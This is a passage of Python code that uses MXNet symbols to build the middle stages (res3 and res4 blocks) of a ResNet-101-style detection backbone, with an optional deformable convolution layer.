kernel=(1, 1), stride=(2, 2), no_bias=True)
bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2a = bn3a_branch2a
res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=scale3a_branch2a, act_type='relu')
res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu, num_filter=128,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2b = bn3a_branch2b
res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=scale3a_branch2b, act_type='relu')
res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu, num_filter=512,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', data=res3a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3a_branch2c = bn3a_branch2c
res3a = mx.symbol.broadcast_add(name='res3a', *[scale3a_branch1, scale3a_branch2c])
res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a, act_type='relu')
res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2a = bn3b1_branch2a
res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=scale3b1_branch2a,
act_type='relu')
res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2b = bn3b1_branch2b
res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=scale3b1_branch2b,
act_type='relu')
res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b1_branch2c = bn3b1_branch2c
res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu, scale3b1_branch2c])
res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1, act_type='relu')
res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2a = bn3b2_branch2a
res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=scale3b2_branch2a,
act_type='relu')
res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2b = bn3b2_branch2b
res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=scale3b2_branch2b,
act_type='relu')
res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b2_branch2c = bn3b2_branch2c
res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu, scale3b2_branch2c])
res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2, act_type='relu')
res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu, num_filter=128, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2a = bn3b3_branch2a
res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=scale3b3_branch2a,
act_type='relu')
if with_dpyramid:
res3b3_branch2b_offset = mx.symbol.Convolution(name='res3b3_branch2b_offset', data=res3b3_branch2a_relu,
num_filter=72, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
res3b3_branch2b = mx.contrib.symbol.DeformableConvolution(name='res3b3_branch2b', data=res3b3_branch2a_relu,
offset=res3b3_branch2b_offset,
num_filter=128, pad=(1, 1), kernel=(3, 3),
num_deformable_group=4,
stride=(1, 1), no_bias=True)
else:
res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', data=res3b3_branch2a_relu, num_filter=128,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2b = bn3b3_branch2b
res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=scale3b3_branch2b,
act_type='relu')
res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu, num_filter=512,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale3b3_branch2c = bn3b3_branch2c
res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu, scale3b3_branch2c])
res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3, act_type='relu')
res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu, num_filter=1024, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch1 = bn4a_branch1
res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(2, 2), no_bias=True)
bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2a = bn4a_branch2a
res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=scale4a_branch2a, act_type='relu')
res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu, num_filter=256,
pad=(1, 1),
kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2b = bn4a_branch2b
res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=scale4a_branch2b, act_type='relu')
res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu, num_filter=1024,
pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4a_branch2c = bn4a_branch2c
res4a = mx.symbol.broadcast_add(name='res4a', *[scale4a_branch1, scale4a_branch2c])
res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a, act_type='relu')
res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2a = bn4b1_branch2a
res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=scale4b1_branch2a,
act_type='relu')
res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2b = bn4b1_branch2b
res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=scale4b1_branch2b,
act_type='relu')
res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b1_branch2c = bn4b1_branch2c
res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu, scale4b1_branch2c])
res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1, act_type='relu')
res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2a = bn4b2_branch2a
res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=scale4b2_branch2a,
act_type='relu')
res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2b = bn4b2_branch2b
res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=scale4b2_branch2b,
act_type='relu')
res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b2_branch2c = bn4b2_branch2c
res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu, scale4b2_branch2c])
res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2, act_type='relu')
res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2a = bn4b3_branch2a
res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=scale4b3_branch2a,
act_type='relu')
res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2b = bn4b3_branch2b
res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=scale4b3_branch2b,
act_type='relu')
res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b3_branch2c = bn4b3_branch2c
res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu, scale4b3_branch2c])
res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3, act_type='relu')
res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2a = bn4b4_branch2a
res4b4_branch2a_relu = mx.symbol.Activation(name='res4b4_branch2a_relu', data=scale4b4_branch2a,
act_type='relu')
res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2b = bn4b4_branch2b
res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=scale4b4_branch2b,
act_type='relu')
res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b4_branch2c = bn4b4_branch2c
res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu, scale4b4_branch2c])
res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4, act_type='relu')
res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2a = bn4b5_branch2a
res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=scale4b5_branch2a,
act_type='relu')
res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2b = bn4b5_branch2b
res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=scale4b5_branch2b,
act_type='relu')
res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b5_branch2c = bn4b5_branch2c
res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu, scale4b5_branch2c])
res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5, act_type='relu')
res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2a = bn4b6_branch2a
res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=scale4b6_branch2a,
act_type='relu')
res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2b = bn4b6_branch2b
res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=scale4b6_branch2b,
act_type='relu')
res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', data=res4b6_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b6_branch2c = bn4b6_branch2c
res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu, scale4b6_branch2c])
res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6, act_type='relu')
res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2a = bn4b7_branch2a
res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=scale4b7_branch2a,
act_type='relu')
res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2b = bn4b7_branch2b
res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=scale4b7_branch2b,
act_type='relu')
res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b7_branch2c = bn4b7_branch2c
res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu, scale4b7_branch2c])
res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7, act_type='relu')
res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2a = bn4b8_branch2a
res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=scale4b8_branch2a,
act_type='relu')
res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2b = bn4b8_branch2b
res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=scale4b8_branch2b,
act_type='relu')
res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b8_branch2c = bn4b8_branch2c
res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu, scale4b8_branch2c])
res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8, act_type='relu')
res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2a = bn4b9_branch2a
res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=scale4b9_branch2a,
act_type='relu')
res4b9_branch2b = mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2b = bn4b9_branch2b
res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=scale4b9_branch2b,
act_type='relu')
res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b9_branch2c = bn4b9_branch2c
res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu, scale4b9_branch2c])
res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9, act_type='relu')
res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2a = bn4b10_branch2a
res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=scale4b10_branch2a,
act_type='relu')
res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2b = bn4b10_branch2b
res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=scale4b10_branch2b,
act_type='relu')
res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b10_branch2c = bn4b10_branch2c
res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu, scale4b10_branch2c])
res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10, act_type='relu')
res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2a = bn4b11_branch2a
res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=scale4b11_branch2a,
act_type='relu')
res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2b = bn4b11_branch2b
res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=scale4b11_branch2b,
act_type='relu')
res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b11_branch2c = bn4b11_branch2c
res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu, scale4b11_branch2c])
res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11, act_type='relu')
res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2a = bn4b12_branch2a
res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=scale4b12_branch2a,
act_type='relu')
res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2b = bn4b12_branch2b
res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=scale4b12_branch2b,
act_type='relu')
res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b12_branch2c = bn4b12_branch2c
res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu, scale4b12_branch2c])
res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12, act_type='relu')
res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2a = bn4b13_branch2a
res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=scale4b13_branch2a,
act_type='relu')
res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2b = bn4b13_branch2b
res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=scale4b13_branch2b,
act_type='relu')
res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b13_branch2c = bn4b13_branch2c
res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu, scale4b13_branch2c])
res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13, act_type='relu')
res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu, num_filter=256, pad=(0, 0),
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2a = bn4b14_branch2a
res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=scale4b14_branch2a,
act_type='relu')
res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu, num_filter=256,
pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True)
bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b, use_global_stats=True,
fix_gamma=False, eps=eps)
scale4b14_branch2b = bn4b14_branch2b
res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=scale4b14_branch2b,
act_type='relu')
res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu, num_filter=1024,
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True)
